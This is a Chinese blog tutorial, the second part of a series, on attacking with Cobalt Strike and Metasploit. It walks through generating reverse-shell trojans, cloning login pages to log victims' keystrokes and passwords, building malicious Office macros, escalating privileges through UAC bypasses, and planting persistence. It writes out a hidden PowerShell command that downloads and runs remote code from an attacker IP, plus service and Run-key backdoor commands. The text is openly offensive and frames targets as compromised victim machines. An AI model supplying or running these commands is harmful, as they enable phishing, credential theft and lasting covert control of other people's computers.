Cobalt Strike使用教程二

0x00 前言

前一章介绍了Cobalt Strike的基本用法,本章接着介绍如何攻击、提权、维权等。

0x01 与Metasploit联动

Cobalt Strike → Metasploit

msf开启监听模式

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.183.147
set lport 4444
run -j

在这里插入图片描述
创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)
在这里插入图片描述
利用HTML Application来生成链接,使得目标设备上线,右击选择spwan,选择msf监听器,点击Choose
在这里插入图片描述
返回msf查看,成功获取meterpreter会话(此方法获取到的会话并不稳定,具体原因未知)
在这里插入图片描述

Metasploit→ Cobalt Strike

当然这里也可以通过用msfvenom生成木马,再由CS发布

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.183.147 lport=4444 -f exe -o msf.exe

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YIb1jVsf-1571904063930)(/images/CobaltStrike2/5.png)]
    在这里插入图片描述
    此时再次查看msf发现获取到会话
    在这里插入图片描述
    至于后面怎么提权可以参考meterpreter使用教程

    0x02 钓鱼攻击

    点击Attacks->Web Driver-by->Clone site,输入想要克隆的网址,这里需要勾选上Log keystrokes来记录输入
    在这里插入图片描述
    然后在肉鸡上访问攻击机IP,访问克隆的网页
    在这里插入图片描述
    当受害者输入了用户名密码,CS在日志里会有记录
    在这里插入图片描述
    我们发现即使受害者输入正确的账号密码系统也会提示用户名密码错误,然后会自动跳转到正确的登录界面,事实上我们还可以实现主动跳转到任意界面。
    为了防止没有主动跳转到正确的页面我们可以选择主动跳转到正确页面
    点击 Attacks->Web Driver-by->System Profiler
    在这里插入图片描述
    当我们访问192.168.183.147:81时会自动跳转到登录页面
    在选择克隆站点时,点击attack右边的…选择我们创建端口为81的profiler
    在这里插入图片描述
    当我们我们访问80端口点击确认后会跳转到正确的登录界面
    在这里插入图片描述

    0x03 宏钓鱼

    点击Attacks->Packages->MS Office Macro
    选择相应的监听器,点击Generate
    在这里插入图片描述
    在这里插入图片描述
    上图告诉我们操作步骤,先打开Word或Excel,转到视图->宏->查看宏,创建一个宏名随意的宏,将复制的宏代码粘贴进去,关闭宏窗口,另存为启用宏的文档。
    点击Copy Macro复制宏代码,选择 Project->Microsoft Word对象->ThisDocument粘贴宏代码,关闭并另存为。
    在这里插入图片描述
    在这里插入图片描述
    当你打开启用宏的文档,CS便会接收到返回的会话
    在这里插入图片描述

    0x04 shellcode

    CS可以生成很多类型的shellcode,如c、c#、java、python、powershell、ruby、raw等
    点击Attacks->package->paylaod generator
    这里以powershell为例
    在这里插入图片描述
    将生成的payload.ps1复制到目标系统并执行以下命令,返回CS查看得到返回的会话

    powershell –exec bypass –Command "& {Import-Module 'C:\payload.ps1'}"

      在这里插入图片描述

      0x05 提权

      elevate提权

      Cobalt Strike内嵌了三个提权exp:ms14-058、uac-dll、uac-token-duplication
      ms14-058是个老提权漏洞利用方式,可利用于Windows 7系统。
      uac-dll和uac-token-duplication是Bypass UAC攻击,是由本地管理员运行payload从中等权限往最高权限提升的过程,适用于windows 7和windows 10。
      我们可以通过导入cna文件来扩展漏洞库,项目地址为ElevateKit
      点击Cobalt Strike->Script Manager来导入cna文件
      在这里插入图片描述
      选中目标机器右击选择Access->Elevate,选择相应的漏洞即可提权
      在这里插入图片描述

      0x06 权限维持

      服务后门

      点击Attacks->web driver-by ->script web delivery
      在这里插入图片描述
      点击launch生成如下命令

      powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.183.148:80/a'))"

        在目标设备执行以上命令会拿到普通用户的权限,这里需要提权
        打开beacon shell并执行命令

        shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.183.148:80/a'))\""

          在这里插入图片描述
          查看受害机器服务,发现名为name的服务项创建成功
          在这里插入图片描述
          不过此时该服务启动类型为手动,我们需要将其设置为自动

          shell sc config "name" start= auto

            在这里插入图片描述
            设置服务的描述字符串

            shell sc description "name" "description"

              在这里插入图片描述
              在这里插入图片描述
              这样一个service后门就设置成功了,即使目标机器重启后依旧可以拿到控制权限。

              注册表后门

              点击Attacks->packages->windows executable生成一个exe木马并上传到目标机器
              上传可以通过Explore>File Browser
              在这里插入图片描述
              当然这里也可以选择将exe设置为服务后门,方法同上

              shell sc create "exe" binpath= "C:\Users\abc\Desktop\artifact.exe"

                下面我们来演示一下如何设置注册表后门

                 shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "keyname" /t REG_SZ /d "C:\Users\abc\Desktop\artifact.exe" /f

                  在这里插入图片描述
                  在这里插入图片描述
                  这样一个注册表自启动后门已经设置成功了

                  posted @ 2021-04-19 17:25  流亡青年  阅读(416)  评论(0编辑  收藏  举报